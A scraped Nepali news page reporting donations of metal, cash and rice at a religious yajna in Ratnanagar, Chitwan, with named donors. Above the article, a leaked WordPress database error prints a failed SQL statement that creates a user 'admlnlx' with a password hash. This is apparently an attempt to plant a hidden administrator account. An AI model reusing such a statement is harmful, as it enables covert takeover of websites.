WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BeUVE.4Bl3IFgnoEyeFkj/VlLZUPe80', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 23:22:36', '', 'admlnlx', 'admlnlx')
चितवन, पुस ८–
अष्टधातु संकलनका लागि पूर्वी चितवनको रत्ननगरमा आयोजना गरिएको श्रीमद भागवत धनधान्याञ्चल एवंम अष्टधातु संकलन ज्ञान महायज्ञमा शुक्रबार करिव पाँच क्विन्टल धातु संकलन भएको छ ।
शुक्रबार ५ क्विन्टल धातुसँगै नगद २ लाख २ हजार ७ सय ८० रुपैयाँ संकलन भएको महायज्ञ मुल समारोह समितिका सचिव मदनराज मिश्रले जानकारी दिए । त्यस्तै २० क्वीन्टल धान पनि प्राप्त भएको उनले बताए । शुक्रबार रत्ननगर–१ का हरिभक्त घिमिरेले ११ हजार १ सय ११, रत्ननगर २ का युनिक बचत तथा ऋण सहकारी संस्थाले ११ हजार १ सय ११, रत्ननगर १ का दुर्गानाथ ढकालले ७ हजार २ सय, रामलीला आचार्यले ६ हजार, पुण्यकुमारी पाठकले ६ हजार रुपैयाँ नगद सहयोग गरे ।
सहयोग गर्ने दाताहरुलाई यज्ञस्थलमा सम्मान पत्र एवं रुद्राक्ष मालाले सम्मान गरिएको थियो । पण्डित अच्युतकृष्ण अधिकारीले कथा बाचन गरिरहेको महायज्ञमा दिनानुदिन भक्तजन बढ्दै गइरहेको सचिव मिश्रले बताए ।